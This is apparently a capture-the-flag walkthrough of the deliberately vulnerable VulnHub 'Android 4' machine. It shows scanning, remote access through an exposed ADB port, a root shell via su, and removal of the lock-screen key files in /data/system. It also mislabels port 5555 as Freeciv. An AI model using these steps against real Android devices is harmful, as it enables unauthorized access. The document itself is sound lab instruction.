Android 4: 1 || VulnHub Complete Walkthrough


Vulhub - Vulnerable By Design

Vulhub is a platform designed to host intentionally vulnerable web applications for educational and testing purposes. It provides a hands-on learning environment for security enthusiasts to practice identifying and exploiting various vulnerabilities in web applications.


The box, I will be writing up from the result is Android 4.


The settings up are quite easy and it is similar to the past videos.

  • Firstly, download the ".ova" mirror image.
    • Open Virtual Box. 
    • Click on import, and browse the file from the Download directory.
  • On completion, Check if the Network Adapter is set to Host-only adapter, or not.

Once you are done with the settings up, let’s start the instance VMs.

The instance is ready, and we have got a UI that asks us to input a password. Our task will be to find the flag and also will unlock the password screen.

Enumeration

The instances are ready and we are on Kali Linux. Let's find out the IP address by using Netdiscover

┌─[mrdev@TS]─[~]
└──╼ $ sudo netdiscover -i vboxnet0

 Currently scanning: 192.168.112.0/16   |   Screen View: Unique Hosts                                                              
                                                                                                                                   
 2 Captured ARP Req/Rep packets, from 2 hosts.   Total size: 102                                                                   
 _____________________________________________________________________________
   IP            At MAC Address     Count     Len  MAC Vendor / Hostname      
 -----------------------------------------------------------------------------
 192.168.56.100  08:00:27:9a:5a:48      1      42  PCS Systemtechnik GmbH                                                          
  192.168.56.108  08:00:27:05:35:56      1      60  PCS Systemtechnik GmbH                                                          

We have discovered an IP address, so let's perform a network scan to detect what ports are open, which is already known as an essential part of the enumeration process. This offers us the opportunity to better understand the attacking surface and design targeted attacks. As in most cases, we are going to use the famous Nmap tool.


Conducting Network Scans with Nmap

  • -sC : Performs a script scan using the default set of scripts. 
  • -sV : Enables version detection, which will detect what versions are running on what port.

┌─[✗]─[mrdev@TS]─[~]
└──╼ $ nmap -sC -sV 192.168.56.108
Starting Nmap 7.92 ( https://nmap.org ) at 2022-01-29 16:44 IST
Nmap scan report for 192.168.56.108
Host is up (0.080s latency).
Not shown: 998 closed tcp ports (conn-refused)
PORT     STATE SERVICE VERSION
5555/tcp open  adb     Android Debug Bridge device (name: android_x86; model: VirtualBox; device: x86)
8080/tcp open  http    PHP cli server 5.5 or later
|_http-open-proxy: Proxy might be redirecting requests
|_http-title: Deface by Good Hackers
Service Info: OS: Android; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 19.94 seconds
┌─[mrdev@TS]─[~]
└──╼ $

From the network scan, we have spotted 2 open ports.

  • Port 5555/TCP seems to be like a Freeciv gaming protocol.
  • Port 8080/TCP running an HTTP service, which indicates that there might be a website running.

To look at the contents ourselves, we can open a web browser of our choice and navigate to the target's IP address along with port 8080 in the URL bar at the top of the window.

Foothold

Anyone would establish that there is some kind of verbal tampering involved in using the POST method. We tried but didn’t find anything useful.

This seems to be like, an information page. 


Discovery of Hidden Directories with Gobuster

Let’s brute force the directory and URL using gobuster. 

┌─[✗]─[mrdev@TS]─[~]
└──╼ $ gobuster dir -u http://192.168.56.108:8080 -w /usr/share/wordlists/dirb/common.txt

We found nothing from the result.

From the Nmap result, we have discovered port 5555 is in an open state. After analyzing, I confirmed that the Android device might be connected through the ADB command-line utility.


Remotely Accessing Android Devices with ADB

If you don’t know, what is ADB

  • Learn More:  

ADB - Android Debugging Bridge

ADB (Android Debug Bridge) is a versatile command-line tool that allows developers to communicate with an Android device from a computer. It enables various debugging and diagnostic tasks, such as installing and debugging apps, accessing the device shell, transferring files, and more.


Firstly open a terminal, and check if there ADB command-line utility is already installed or not. If not then install it.

┌─[mrdev@TS]─[~]
└──╼ $ sudo apt-get install adb

To get to connect the Android device through the network:

┌─[mrdev@TS]─[~]
└──╼ $ adb connect 192.168.56.108:5555
connected to 192.168.56.108:5555
┌─[mrdev@TS]─[~]
└──╼ $

On successful execution, you can list the connected devices using ADB devices. As you can see, we have successfully managed to get into the server.

┌─[mrdev@TS]─[~]
└──╼ $ adb devices
List of devices attached
192.168.56.108:5555 devices
┌─[mrdev@TS]─[~]
└──╼ $

To get interaction with the shell, use the ADB-shell command, where you can perform Linux commands to get the flag.

┌─[mrdev@TS]─[~]
└──╼ $ adb shell
uid=2000(shell) gid=2000(shell) groups=1003(graphics),1004(input),1007(log),1011(adb),1015(sdcard_rw),1028(sdcard_r),3001(net_bt_admin),3002(net_bt),3003(inet),3006(net_bw_stats)@x86:/ $ 


Privilege Escalation

From the output of the ADB shell command, we have successfully managed to get a shell that seems to be like a normal user account. To switch the user to superuser access then run the su command.

uid=2000(shell) gid=2000(shell) groups=1003(graphics),1004(input),1007(log),1011(adb),1015(sdcard_rw),1028(sdcard_r),3001(net_bt_admin),3002(net_bt),3003(inet),3006(net_bw_stats)@x86:/ $ su
uid=0(root) gid=0(root)@x86:/ #

We have successfully managed to escalate to the highest privilege. You can find the root flag to complete the challenge.

uid=0(root) gid=0(root)@x86:/ # cd /data/root
uid=0(root) gid=0(root)@x86:/data/root # ls
flag.txt
uid=0(root) gid=0(root)@x86:/data/root # cat flag.txt
ANDROID{u_GOT_root_buddy}
uid=0(root) gid=0(root)@x86:/data/root #

Congratulations on the completion of capturing the flag.


Bypassing Android Device Lock Screen Security

Let’s see if we could remove the lock screen password using ADB. So firstly change the directory to the previous directory which is a data directory. 

From here change the directory to the system, and list all files and directories. 

uid=0(root) gid=0(root)@x86:/data/root # cd ..
uid=0(root) gid=0(root)@x86:/data # cd system
uid=0(root) gid=0(root)@x86:/data/system # ls
appops.xml
batterystats.bin
called_pre_boots.dat
device_policies.xml
dropbox
entropy.dat
framework_atlas.config
gesture.key
ifw
inputmethod
locksettings.db
locksettings.db-shm
locksettings.db-wal
ndebugsocket
netstats
packages.list
packages.xml
password.key
procstats
registered_services
shared_prefs
sync
uiderrors.txt
usagestats
users
uid=0(root) gid=0(root)@x86:/data/system #

The keys are stored within the file which contains the ".key" extension. 

uid=0(root) gid=0(root)@x86:/data/system # cat password.key
68683BEA625263C8F04CBBC88D13233FBD2B6B875C707BC04B48AD1AD1733F739969F9D7 uid=0(root) gid=0(root)@x86:/data/system # 
uid=0(root) gid=0(root)@x86:/data/system # rm *.key     # To remove all password Keys
uid=0(root) gid=0(root)@x86:/data/system # 

The key files are removed.  Reboot the device to see the magic. 

We have successfully managed to bypass the lock screen.

Tags

You may like these posts

Show more

Post a Comment

0 Comments
* Please Don't Spam Here. All the Comments are Reviewed by Admin.

If you have any doubts or any queries you can specify here.

#buttons=(Ok, Go it!) #days=(20)

Our website uses cookies to enhance your experience. Learn More
Ok, Go it!